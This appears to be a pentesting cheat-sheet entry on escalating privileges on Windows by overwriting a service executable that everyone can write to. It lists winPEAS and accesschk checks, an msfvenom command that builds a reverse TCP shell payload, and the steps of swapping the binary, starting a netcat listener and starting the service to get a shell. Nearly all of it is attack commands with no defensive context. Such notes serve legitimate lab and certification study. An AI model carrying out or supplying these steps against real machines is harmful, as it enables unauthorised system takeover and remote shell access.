Run PowerUp and check for: Service executable and argument permissions. Check if we have RW access to the file. In winPEAS it comes under Services Information. It is displayed with File Permissions: Everyone [AllAccess]
Example: (winPEAS)
#filepermsvc(File Permissions Service)["C:\Program Files\File Permissions Service\filepermservice.exe"]
#Verify the permissions
accesschk /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
#Verify if we can start and stop service
accesschk /accepteula -uvqc filepermsvc
#Create a reverse shell file
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=4444 -f exe -o filepermservice.exe
#Replace the original file with the shell file
#Start netcat listener and start the service
sc start filepermsvc
#You will get shell
